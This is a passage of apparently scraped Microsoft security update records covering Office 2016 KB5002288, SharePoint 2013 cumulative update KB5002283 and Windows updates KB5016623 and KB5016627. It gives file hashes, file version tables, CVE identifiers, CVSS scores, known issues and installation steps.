Guide](<https://msrc.microsoft.com/update-guide/deployments>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [5002178](<https://support.microsoft.com/kb/5002178>).\n\n### File hash information\n\nFile name| SHA256 hash \n---|--- \nmso2016-kb5002288-fullfile-x86-glb.exe| 97E7896D7817FC39F1EAA6FF13F4094CB96B16BE69FD2B0170610F0C05A0BCD1 \nmso2016-kb5002288-fullfile-x64-glb.exe| 769DC4095AA7C69EC8F7B8F84F238CE34AE20CD1B93836F52F81D39546C68563 \n \n### File information\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. 
Additionally, the dates and times may change when you perform certain operations on the files.\n\n#### \n\n__\n\nFor all supported x86-based versions of Office 2016\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nfirstrun.exe| firstrun.exe| 16.0.5149.1000| 774440| 13-Sep-22| 06:01 \nmsointl.dll.x86.1025| msointl.dll| 16.0.4927.1000| 3287904| 14-Sep-22| 01:51 \nmsointl.dll.x86.1026| msointl.dll| 16.0.4927.1000| 1886048| 14-Sep-22| 01:51 \nmsointl.dll.x86.1027| msointl.dll| 16.0.4927.1000| 1817952| 14-Sep-22| 02:13 \nmsointl.dll.x86.1029| msointl.dll| 16.0.4927.1000| 1928032| 14-Sep-22| 01:51 \nmsointl.dll.x86.1030| msointl.dll| 16.0.4927.1000| 1758040| 14-Sep-22| 01:51 \nmsointl.dll.x86.1031| msointl.dll| 16.0.4927.1000| 1948216| 14-Sep-22| 01:51 \nmsointl.dll.x86.1032| msointl.dll| 16.0.4927.1000| 2057048| 14-Sep-22| 01:51 \nmsointl.dll.x86.3082| msointl.dll| 16.0.4927.1000| 1826360| 14-Sep-22| 01:52 \nmsointl.dll.x86.1061| msointl.dll| 16.0.4927.1000| 1731664| 14-Sep-22| 01:52 \nmsointl.dll.x86.1069| msointl.dll| 16.0.4927.1000| 1740640| 14-Sep-22| 02:13 \nmsointl.dll.x86.1035| msointl.dll| 16.0.4927.1000| 1738504| 14-Sep-22| 01:52 \nmsointl.dll.x86.1036| msointl.dll| 16.0.4927.1000| 1975360| 14-Sep-22| 01:52 \nmsointl.dll.x86.1110| msointl.dll| 16.0.4927.1000| 1774648| 14-Sep-22| 02:13 \nmsointl.dll.x86.1095| msointl.dll| 16.0.4927.1000| 1830688| 14-Sep-22| 02:13 \nmsointl.dll.x86.1037| msointl.dll| 16.0.4927.1000| 2907936| 14-Sep-22| 01:52 \nmsointl.dll.x86.1081| msointl.dll| 16.0.4927.1000| 1952312| 14-Sep-22| 01:52 \nmsointl.dll.x86.1050| msointl.dll| 16.0.4927.1000| 1742088| 14-Sep-22| 01:52 \nmsointl.dll.x86.1038| msointl.dll| 16.0.4927.1000| 1951584| 14-Sep-22| 01:52 \nmsointl.dll.x86.1057| msointl.dll| 16.0.4927.1000| 1621848| 14-Sep-22| 01:52 \nmsointl.dll.x86.1040| msointl.dll| 16.0.4927.1000| 1766240| 14-Sep-22| 01:52 \nmsointl.dll.x86.1041| msointl.dll| 16.0.4927.1000| 2012512| 14-Sep-22| 01:51 
\nmsointl.dll.x86.1087| msointl.dll| 16.0.4927.1000| 2103648| 14-Sep-22| 01:52 \nmsointl.dll.x86.1099| msointl.dll| 16.0.4927.1000| 1940320| 14-Sep-22| 02:14 \nmsointl.dll.x86.1042| msointl.dll| 16.0.4927.1000| 2768736| 14-Sep-22| 01:52 \nmsointl.dll.x86.1063| msointl.dll| 16.0.4927.1000| 1845808| 14-Sep-22| 01:52 \nmsointl.dll.x86.1062| msointl.dll| 16.0.4927.1000| 1832016| 14-Sep-22| 01:52 \nmsointl.dll.x86.1086| msointl.dll| 16.0.4927.1000| 1649232| 14-Sep-22| 01:52 \nmsointl.dll.x86.1044| msointl.dll| 16.0.4927.1000| 1721624| 14-Sep-22| 01:52 \nmsointl.dll.x86.1043| msointl.dll| 16.0.4927.1000| 1771264| 14-Sep-22| 01:52 \nmsointl.dll.x86.1045| msointl.dll| 16.0.4927.1000| 1917280| 14-Sep-22| 01:52 \nmsointl.dll.x86.1046| msointl.dll| 16.0.4927.1000| 1829656| 14-Sep-22| 01:52 \nmsointl.dll.x86.2070| msointl.dll| 16.0.4927.1000| 1836312| 14-Sep-22| 01:52 \nmsointl.dll.x86.1048| msointl.dll| 16.0.4927.1000| 1963064| 14-Sep-22| 01:52 \nmsointl.dll.x86.1049| msointl.dll| 16.0.4927.1000| 1904384| 14-Sep-22| 01:52 \nmsointl.dll.x86.1051| msointl.dll| 16.0.4927.1000| 1971552| 14-Sep-22| 01:52 \nmsointl.dll.x86.1060| msointl.dll| 16.0.4927.1000| 1807712| 14-Sep-22| 01:52 \nmsointl.dll.x86.2074| msointl.dll| 16.0.4927.1000| 1765936| 14-Sep-22| 01:52 \nmsointl.dll.x86.9242| msointl.dll| 16.0.4927.1000| 1794912| 14-Sep-22| 01:52 \nmsointl.dll.x86.1053| msointl.dll| 16.0.4927.1000| 1734912| 14-Sep-22| 01:52 \nmsointl.dll.x86.1054| msointl.dll| 16.0.4927.1000| 1827376| 14-Sep-22| 01:52 \nmsointl.dll.x86.1055| msointl.dll| 16.0.4927.1000| 1998680| 14-Sep-22| 01:52 \nmsointl.dll.x86.1058| msointl.dll| 16.0.4927.1000| 1891896| 14-Sep-22| 01:52 \nmsointl.dll.x86.1066| msointl.dll| 16.0.4927.1000| 2005552| 14-Sep-22| 01:52 \nmsointl.dll.x86.2052| msointl.dll| 16.0.4927.1000| 2321704| 14-Sep-22| 01:52 \nmsointl.dll.x86.1028| msointl.dll| 16.0.4927.1000| 2329384| 14-Sep-22| 01:52 \nmsores.dll| msores.dll| 16.0.4795.1000| 81683304| 13-Sep-22| 06:01 \nmsores.dll.x86| msores.dll| 
16.0.4795.1000| 81683304| 13-Sep-22| 05:57 \nmso.dll.x86| mso.dll| 16.0.5365.1000| 14426040| 15-Sep-22| 04:53 \nmsointl.dll.x86.1033| msointl.dll| 16.0.4927.1000| 1539640| 13-Sep-22| 05:54 \n \n#### \n\n__\n\nFor all supported x64-based versions of Office 2016\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nfirstrun.exe| firstrun.exe| 16.0.5149.1000| 816928| 13-Sep-22| 05:55 \nmsointl.dll.x64.1025| msointl.dll| 16.0.5365.1000| 3326904| 15-Sep-22| 05:24 \nmsointl.dll.x64.1026| msointl.dll| 16.0.5365.1000| 1912248| 15-Sep-22| 04:56 \nmsointl.dll.x64.1027| msointl.dll| 16.0.5365.1000| 1844112| 15-Sep-22| 05:15 \nmsointl.dll.x64.1029| msointl.dll| 16.0.5365.1000| 1954232| 15-Sep-22| 05:24 \nmsointl.dll.x64.1030| msointl.dll| 16.0.5365.1000| 1784208| 15-Sep-22| 05:24 \nmsointl.dll.x64.1031| msointl.dll| 16.0.5365.1000| 1974672| 15-Sep-22| 05:23 \nmsointl.dll.x64.1032| msointl.dll| 16.0.5365.1000| 2083728| 15-Sep-22| 05:24 \nmsointl.dll.x64.3082| msointl.dll| 16.0.5365.1000| 1852816| 15-Sep-22| 05:23 \nmsointl.dll.x64.1061| msointl.dll| 16.0.5365.1000| 1757624| 15-Sep-22| 04:56 \nmsointl.dll.x64.1069| msointl.dll| 16.0.5365.1000| 1766800| 15-Sep-22| 05:15 \nmsointl.dll.x64.1035| msointl.dll| 16.0.5365.1000| 1764752| 15-Sep-22| 05:24 \nmsointl.dll.x64.1036| msointl.dll| 16.0.5365.1000| 2001352| 15-Sep-22| 05:23 \nmsointl.dll.x64.1110| msointl.dll| 16.0.5365.1000| 1801128| 15-Sep-22| 05:16 \nmsointl.dll.x64.1095| msointl.dll| 16.0.5365.1000| 1856952| 15-Sep-22| 05:16 \nmsointl.dll.x64.1037| msointl.dll| 16.0.5365.1000| 2946936| 15-Sep-22| 05:24 \nmsointl.dll.x64.1081| msointl.dll| 16.0.5365.1000| 1978808| 15-Sep-22| 05:24 \nmsointl.dll.x64.1050| msointl.dll| 16.0.5365.1000| 1768360| 15-Sep-22| 05:24 \nmsointl.dll.x64.1038| msointl.dll| 16.0.5365.1000| 1977784| 15-Sep-22| 04:56 \nmsointl.dll.x64.1057| msointl.dll| 16.0.5365.1000| 1648056| 15-Sep-22| 04:56 \nmsointl.dll.x64.1040| msointl.dll| 16.0.5365.1000| 1792936| 15-Sep-22| 
05:23 \nmsointl.dll.x64.1041| msointl.dll| 16.0.5365.1000| 2038712| 15-Sep-22| 05:23 \nmsointl.dll.x64.1087| msointl.dll| 16.0.5365.1000| 2130360| 15-Sep-22| 05:24 \nmsointl.dll.x64.1099| msointl.dll| 16.0.5365.1000| 1966520| 15-Sep-22| 05:16 \nmsointl.dll.x64.1042| msointl.dll| 16.0.5365.1000| 2795448| 15-Sep-22| 05:23 \nmsointl.dll.x64.1063| msointl.dll| 16.0.5365.1000| 1871800| 15-Sep-22| 05:24 \nmsointl.dll.x64.1062| msointl.dll| 16.0.5365.1000| 1857976| 15-Sep-22| 05:24 \nmsointl.dll.x64.1086| msointl.dll| 16.0.5365.1000| 1675704| 15-Sep-22| 04:56 \nmsointl.dll.x64.1044| msointl.dll| 16.0.5365.1000| 1747384| 15-Sep-22| 05:24 \nmsointl.dll.x64.1043| msointl.dll| 16.0.5365.1000| 1797560| 15-Sep-22| 05:24 \nmsointl.dll.x64.1045| msointl.dll| 16.0.5365.1000| 1943480| 15-Sep-22| 05:24 \nmsointl.dll.x64.1046| msointl.dll| 16.0.5365.1000| 1855928| 15-Sep-22| 05:24 \nmsointl.dll.x64.2070| msointl.dll| 16.0.5365.1000| 1862584| 15-Sep-22| 05:24 \nmsointl.dll.x64.1048| msointl.dll| 16.0.5365.1000| 1989048| 15-Sep-22| 05:24 \nmsointl.dll.x64.1049| msointl.dll| 16.0.5365.1000| 1930152| 15-Sep-22| 05:24 \nmsointl.dll.x64.1051| msointl.dll| 16.0.5365.1000| 1998264| 15-Sep-22| 04:56 \nmsointl.dll.x64.1060| msointl.dll| 16.0.5365.1000| 1834424| 15-Sep-22| 04:56 \nmsointl.dll.x64.2074| msointl.dll| 16.0.5365.1000| 1792440| 15-Sep-22| 05:24 \nmsointl.dll.x64.9242| msointl.dll| 16.0.5365.1000| 1821112| 15-Sep-22| 05:24 \nmsointl.dll.x64.1053| msointl.dll| 16.0.5365.1000| 1761208| 15-Sep-22| 05:24 \nmsointl.dll.x64.1054| msointl.dll| 16.0.5365.1000| 1853352| 15-Sep-22| 05:24 \nmsointl.dll.x64.1055| msointl.dll| 16.0.5365.1000| 2025400| 15-Sep-22| 05:24 \nmsointl.dll.x64.1058| msointl.dll| 16.0.5365.1000| 1917880| 15-Sep-22| 05:24 \nmsointl.dll.x64.1066| msointl.dll| 16.0.5365.1000| 2032056| 15-Sep-22| 04:56 \nmsointl.dll.x64.2052| msointl.dll| 16.0.5365.1000| 2348416| 15-Sep-22| 05:23 \nmsointl.dll.x64.1028| msointl.dll| 16.0.5365.1000| 2356096| 15-Sep-22| 05:23 
\nmsointl.dll.x86.1025| msointl.dll| 16.0.4927.1000| 3287904| 14-Sep-22| 01:51 \nmsointl.dll.x86.1026| msointl.dll| 16.0.4927.1000| 1886048| 14-Sep-22| 01:51 \nmsointl.dll.x86.1029| msointl.dll| 16.0.4927.1000| 1928032| 14-Sep-22| 01:51 \nmsointl.dll.x86.1030| msointl.dll| 16.0.4927.1000| 1758040| 14-Sep-22| 01:51 \nmsointl.dll.x86.1031| msointl.dll| 16.0.4927.1000| 1948216| 14-Sep-22| 01:51 \nmsointl.dll.x86.1032| msointl.dll| 16.0.4927.1000| 2057048| 14-Sep-22| 01:51 \nmsointl.dll.x86.3082| msointl.dll| 16.0.4927.1000| 1826360| 14-Sep-22| 01:52 \nmsointl.dll.x86.1061| msointl.dll| 16.0.4927.1000| 1731664| 14-Sep-22| 01:52 \nmsointl.dll.x86.1035| msointl.dll| 16.0.4927.1000| 1738504| 14-Sep-22| 01:52 \nmsointl.dll.x86.1036| msointl.dll| 16.0.4927.1000| 1975360| 14-Sep-22| 01:52 \nmsointl.dll.x86.1037| msointl.dll| 16.0.4927.1000| 2907936| 14-Sep-22| 01:52 \nmsointl.dll.x86.1081| msointl.dll| 16.0.4927.1000| 1952312| 14-Sep-22| 01:52 \nmsointl.dll.x86.1050| msointl.dll| 16.0.4927.1000| 1742088| 14-Sep-22| 01:52 \nmsointl.dll.x86.1038| msointl.dll| 16.0.4927.1000| 1951584| 14-Sep-22| 01:52 \nmsointl.dll.x86.1057| msointl.dll| 16.0.4927.1000| 1621848| 14-Sep-22| 01:52 \nmsointl.dll.x86.1040| msointl.dll| 16.0.4927.1000| 1766240| 14-Sep-22| 01:52 \nmsointl.dll.x86.1041| msointl.dll| 16.0.4927.1000| 2012512| 14-Sep-22| 01:51 \nmsointl.dll.x86.1087| msointl.dll| 16.0.4927.1000| 2103648| 14-Sep-22| 01:52 \nmsointl.dll.x86.1042| msointl.dll| 16.0.4927.1000| 2768736| 14-Sep-22| 01:52 \nmsointl.dll.x86.1063| msointl.dll| 16.0.4927.1000| 1845808| 14-Sep-22| 01:52 \nmsointl.dll.x86.1062| msointl.dll| 16.0.4927.1000| 1832016| 14-Sep-22| 01:52 \nmsointl.dll.x86.1086| msointl.dll| 16.0.4927.1000| 1649232| 14-Sep-22| 01:52 \nmsointl.dll.x86.1044| msointl.dll| 16.0.4927.1000| 1721624| 14-Sep-22| 01:52 \nmsointl.dll.x86.1043| msointl.dll| 16.0.4927.1000| 1771264| 14-Sep-22| 01:52 \nmsointl.dll.x86.1045| msointl.dll| 16.0.4927.1000| 1917280| 14-Sep-22| 01:52 \nmsointl.dll.x86.1046| 
msointl.dll| 16.0.4927.1000| 1829656| 14-Sep-22| 01:52 \nmsointl.dll.x86.2070| msointl.dll| 16.0.4927.1000| 1836312| 14-Sep-22| 01:52 \nmsointl.dll.x86.1048| msointl.dll| 16.0.4927.1000| 1963064| 14-Sep-22| 01:52 \nmsointl.dll.x86.1049| msointl.dll| 16.0.4927.1000| 1904384| 14-Sep-22| 01:52 \nmsointl.dll.x86.1051| msointl.dll| 16.0.4927.1000| 1971552| 14-Sep-22| 01:52 \nmsointl.dll.x86.1060| msointl.dll| 16.0.4927.1000| 1807712| 14-Sep-22| 01:52 \nmsointl.dll.x86.2074| msointl.dll| 16.0.4927.1000| 1765936| 14-Sep-22| 01:52 \nmsointl.dll.x86.9242| msointl.dll| 16.0.4927.1000| 1794912| 14-Sep-22| 01:52 \nmsointl.dll.x86.1053| msointl.dll| 16.0.4927.1000| 1734912| 14-Sep-22| 01:52 \nmsointl.dll.x86.1054| msointl.dll| 16.0.4927.1000| 1827376| 14-Sep-22| 01:52 \nmsointl.dll.x86.1055| msointl.dll| 16.0.4927.1000| 1998680| 14-Sep-22| 01:52 \nmsointl.dll.x86.1058| msointl.dll| 16.0.4927.1000| 1891896| 14-Sep-22| 01:52 \nmsointl.dll.x86.1066| msointl.dll| 16.0.4927.1000| 2005552| 14-Sep-22| 01:52 \nmsointl.dll.x86.2052| msointl.dll| 16.0.4927.1000| 2321704| 14-Sep-22| 01:52 \nmsointl.dll.x86.1028| msointl.dll| 16.0.4927.1000| 2329384| 14-Sep-22| 01:52 \nconversion.office.msores.dll| msores.dll| 16.0.4795.1000| 81683088| 13-Sep-22| 05:47 \nmsores.dll| msores.dll| 16.0.4795.1000| 81683088| 13-Sep-22| 05:47 \nppt.conversion.msores.dll| msores.dll| 16.0.4795.1000| 81683088| | \nppt.edit.msores.dll| msores.dll| 16.0.4795.1000| 81683088| | \nwac.office.msores.dll| msores.dll| 16.0.4795.1000| 81683088| | \nmsores.dll| msores.dll| 16.0.4795.1000| 81683304| 13-Sep-22| 05:47 \nmsores.dll.x86| msores.dll| 16.0.4795.1000| 81683304| 13-Sep-22| 05:57 \nmso.dll.x64| mso.dll| 16.0.5365.1000| 19883944| 15-Sep-22| 04:51 \nmso.dll.x86| mso.dll| 16.0.5365.1000| 14426040| 15-Sep-22| 04:53 \nmsointl.dll.x64.1033| msointl.dll| 16.0.4927.1000| 1564424| 13-Sep-22| 05:48 \nmsointl.dll.x86.1033| msointl.dll| 16.0.4927.1000| 1539640| 13-Sep-22| 05:54 \n \n## Information about protection and 
security\n\nProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-11T07:00:00", "type": "mskb", "title": "Description of the security update for Office 2016: October 11, 2022 (KB5002288)", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-38048"], "modified": "2022-10-11T07:00:00", "id": "KB5002288", "href": "https://support.microsoft.com/en-us/help/5002288", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-10T10:46:45", "description": "None\nCumulative update packages for Microsoft SharePoint Enterprise Server 2013 contain hotfixes for the issues that were fixed since the release of SharePoint Enterprise Server 2013.\n\n**Note: **This is build **15.0.5493.1000** of the cumulative update package.\n\nWe recommend that you test those hotfixes before you deploy them in a production environment. Because the builds are cumulative, each new release contains all the hotfixes and security updates that were included with the previous Microsoft SharePoint Enterprise Server 2013 update package releases.**Important notes about the cumulative update package**\n\n * The Microsoft Office 2013 hotfixes are now multilingual. This cumulative update package contains updates for all languages.\n * This cumulative update package includes all the server component packages. 
Additionally, this cumulative update package updates only those components that are installed on the system.\n\n## Improvements and fixes in this cumulative update\n\nThis cumulative update package fixes the issues that are described in the following Microsoft Knowledge Base (KB) articles:\n\n * October 11, 2022, update for SharePoint Enterprise Server 2013 (KB5002260)\n * October 11, 2022, update for SharePoint Enterprise Server 2013 (KB4486686)\n * Description of the security update for SharePoint Foundation 2013: October 11, 2022 (KB5002284)\n\n## How to download and install the update\n\nThis update is available only for manual download and installation from the Microsoft Download Center.\n\n * [Download cumulative update 5002283 for SharePoint Enterprise Server 2013](<https://www.microsoft.com/download/details.aspx?familyid=9f070ed7-4b99-4412-82e1-1af8c8bacbb8>)\n\n**Note: **Three files are available in this update: one .exe file and two .cab files. In order for the installation to work correctly, you must download all three files.\n\n**Virus-scan claim**Microsoft scanned this file for viruses by using the most current virus-detection software that was available on the date that the file was posted. The file is stored on security-enhanced servers that help prevent any unauthorized changes to it.\n\n## Cumulative update package information\n\n### Hotfixes that are included in this cumulative update package\n\nThis cumulative update package contains all the .msp files that we released as hotfixes or as public updates that target SharePoint Server 2013. This update package also targets SharePoint Foundation 2013. 
Therefore, you don't have to install those packages separately.

### Prerequisites

To apply this cumulative update, you must have [Microsoft SharePoint Server 2013 Service Pack 1 (SP1)](<https://support.microsoft.com/help/2880552>) installed.

### Restart requirement

You may have to restart the computer after you apply this cumulative update.

## File information

For the list of files that are included in the cumulative update 5002283, download the [file information](<https://download.microsoft.com/download/d/3/d/d3de7925-70bb-4fc8-b2be-c4a9e2ce7921/5002283.csv>).

## References

See the information about the standard [terminology](<https://support.microsoft.com/help/824684/description-of-the-standard-terminology-that-is-used-to-describe-micro>) that's used to describe Microsoft software updates. The [Office System TechCenter](<https://docs.microsoft.com/office/admins-itprofessionals>) contains the latest administrative updates and strategic deployment resources for all versions of Office.

**Record:** October 11, 2022, cumulative update for SharePoint Enterprise Server 2013 (KB5002283); id KB5002283 (type mskb, bulletin family microsoft); published and modified 2022-10-11; CVE list: CVE-2022-41038; CVSS v3.1 base score 8.8 (HIGH), vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H, exploitability score 2.8, impact score 5.9; no CVSS v2 data; source: <https://support.microsoft.com/en-us/help/5002283>.

* * *

# August 9, 2022—KB5016623 (OS Build 17763.3287)

**Record:** id KB5016623 (type mskb, bulletin family microsoft); published and modified 2022-10-11; last seen 2023-03-15; CVE list: CVE-2022-34689; CVSS v3.1 base score 7.5 (HIGH), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N, exploitability score 3.9, impact score 3.6; no CVSS v2 data; source: <https://support.microsoft.com/en-us/help/5016623>.

**NEW 8/26/22** **IMPORTANT** Microsoft released [KB5012170](<http://support.microsoft.com/help/5012170>) on August 9, 2022. It provides support for Secure Boot Forbidden Signature Database (DBX). This is a standalone, security update. Windows 8.1 and newer clients and Windows Server 2012 and newer servers must install this update regardless of whether BitLocker is enabled or supported on your device. After you install the update, you might receive error “0x800f0922”; see [Update might fail to install and you might receive a 0x800f0922 error](<https://docs.microsoft.com/windows/release-health/status-windows-11-21h2#2883msgdesc>). After you install the update, your device might start up in [BitLocker recovery mode](<https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn383583\(v=ws.11\)>). See [Some devices might start up into BitLocker Recovery](<https://docs.microsoft.com/windows/release-health/status-windows-11-21h2#some-devices-might-start-up-into-bitlocker-recovery>) and [Finding your BitLocker recovery key in Windows](<https://support.microsoft.com/windows/finding-your-bitlocker-recovery-key-in-windows-6b71ad27-0b89-ea08-f143-056f5ab347d6>).

**7/12/22**
After September 20, 2022, there will no longer be optional, non-security releases (known as "C" or preview releases) for the 2019 LTSC editions and Windows Server 2019. Only cumulative monthly security updates (known as the "B" or Update Tuesday release) will continue for the 2019 LTSC editions and Windows Server 2019.

**11/17/20**
For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). For an overview of Windows 10, version 1809, see its update history page.

## Highlights

 * Addresses security issues for your Windows operating system.

## Improvements

This security update includes improvements that were a part of update KB5015880 (released July 21, 2022) and also addresses the following issues:

 * Addresses an issue that might cause the Local Security Authority Server Service (LSASS) to leak tokens. This issue affects devices that have installed Windows updates dated June 14, 2022 or later. This issue occurs when the device performs a specific form of service for user (S4U) in a non-Trusted Computing Base (TCB) Windows service that runs as Network Service.

If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device. For more information about security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [August 2022 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Aug>).

### Windows 10 servicing stack update - 17763.3232

This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.

## Known issues in this update

**Symptom**| **Workaround**
---|---
After installing KB4493509, devices with some Asian language packs installed may receive the error, "0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND."| This issue is addressed by updates released June 11, 2019 and later. We recommend you install the latest security updates for your device. Customers installing Windows Server 2019 using media should install the latest [Servicing Stack Update (SSU)](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) before installing the language pack or other optional components. If using the [Volume Licensing Service Center (VLSC)](<https://www.microsoft.com/licensing/servicecenter/default.aspx>), acquire the latest Windows Server 2019 media available. The proper order of installation is as follows: (1) install the latest prerequisite SSU, currently [KB5005112](<https://support.microsoft.com/help/5005112>); (2) install optional components or language packs; (3) install the latest cumulative update. **Note** Updating your device will prevent this issue, but will have no effect on devices already affected by this issue. If this issue is present in your device, you will need to use the workaround steps to repair it. **Workaround:** (1) Uninstall and reinstall any recently added language packs. For instructions, see [Manage the input and display language settings in Windows 10](<https://support.microsoft.com/windows/manage-the-input-and-display-language-settings-in-windows-12a10cb4-8626-9b77-0ccb-5013e0c7c7a2>). (2) Click **Check for Updates** and install the April 2019 Cumulative Update or later. For instructions, see [Update Windows 10](<https://support.microsoft.com/windows/update-windows-3c5ae7fc-9fb6-9af1-1984-b5e0412c556a>). **Note** If reinstalling the language pack does not mitigate the issue, use the In-Place-Upgrade feature. For guidance, see [How to do an in-place upgrade on Windows](<https://docs.microsoft.com/troubleshoot/windows-server/deployment/repair-or-in-place-upgrade>), and [Perform an in-place upgrade of Windows Server](<https://docs.microsoft.com/windows-server/get-started/perform-in-place-upgrade>).
After installing KB5001342 or later, the Cluster Service might fail to start because a Cluster Network Driver is not found.| This issue occurs because of an update to the PnP class drivers used by this service. After about 20 minutes, you should be able to restart your device and not encounter this issue. For more information about the specific errors, cause, and workaround for this issue, please see KB5003571.
Starting at 12:00 A.M. Saturday, September 10, 2022, the official time in Chile will advance 60 minutes in accordance with the August 9, 2022 official announcement by the Chilean government about a daylight saving time (DST) time zone change. This moves the DST change which was previously September 4 to September 10. Symptoms if the workaround is not used on devices between September 4, 2022 and September 11, 2022: time shown in Windows and apps will not be correct; apps and cloud services which use date and time for integral functions, such as Microsoft Teams and Microsoft Outlook, notifications and scheduling of meetings might be 60 minutes off; automation that uses date and time, such as Scheduled tasks, might not run at the expected time; timestamps on transactions, files, and logs will be 60 minutes off; operations that rely on time-dependent protocols such as Kerberos might cause authentication failures when attempting to logon or access resources; Windows devices and apps outside of Chile might also be affected if they are connecting to servers or devices in Chile or if they are scheduling or attending meetings taking place in Chile from another location or time zone. Windows devices outside of Chile should not use the workaround, as it would change their local time on the device.| This issue is addressed in KB5017379.

## How to get this update

**Before installing this update** Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/topic/servicing-stack-updates-ssu-frequently-asked-questions-06b62771-1cb0-368c-09cf-87c4efc4f2fe>).

**Prerequisite:** You **must** install the August 10, 2021 SSU (KB5005112) before installing the LCU.

**Install this update**

**Release Channel**| **Available**| **Next Step**
---|---|---
Windows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update.
Windows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
Microsoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5016623>) website.
Windows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows: **Product**: Windows 10; **Classification**: Security Updates

**If you want to remove the LCU** To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**. Running [Windows Update Standalone Installer](<https://support.microsoft.com/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall** switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.

**File information** For a list of the files that are provided in this update, download the [file information for cumulative update 5016623](<https://download.microsoft.com/download/8/a/8/8a85b65e-7837-4878-a25b-b094c3442c82/5016623.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 17763.3232](<https://download.microsoft.com/download/f/5/1/f51753ae-66cd-4568-8fb6-5a5cbf79186c/SSU_version_17763_3232.csv>).

* * *

# August 9, 2022—KB5016627 (OS Build 20348.887)

**Record:** id KB5016627 (type mskb, bulletin family microsoft); published and modified 2022-10-11; last seen 2023-03-15; CVE list: CVE-2022-34689; CVSS v3.1 base score 7.5 (HIGH), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N, exploitability score 3.9, impact score 3.6; no CVSS v2 data; source: <https://support.microsoft.com/en-us/help/5016627>.

**NEW 8/26/22** **IMPORTANT** Microsoft released [KB5012170](<http://support.microsoft.com/help/5012170>) on August 9, 2022. It provides support for Secure Boot Forbidden Signature Database (DBX). This is a standalone, security update. Windows 8.1 and newer clients and Windows Server 2012 and newer servers must install this update regardless of whether BitLocker is enabled or supported on your device. After you install the update, you might receive error “0x800f0922”; see [Update might fail to install and you might receive a 0x800f0922 error](<https://docs.microsoft.com/windows/release-health/status-windows-11-21h2#2883msgdesc>). After you install the update, your device might start up in [BitLocker recovery mode](<https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn383583\(v=ws.11\)>). See [Some devices might start up into BitLocker Recovery](<https://docs.microsoft.com/windows/release-health/status-windows-11-21h2#some-devices-might-start-up-into-bitlocker-recovery>) and [Finding your BitLocker recovery key in Windows](<https://support.microsoft.com/windows/finding-your-bitlocker-recovery-key-in-windows-6b71ad27-0b89-ea08-f143-056f5ab347d6>).

For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). For an overview of Windows Server 2022, see its update history page. **Note** Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the Windows release health dashboard.

## Improvements

This security update includes improvements that were a part of update KB5015879 (released July 19, 2022) and also addresses the following issues:

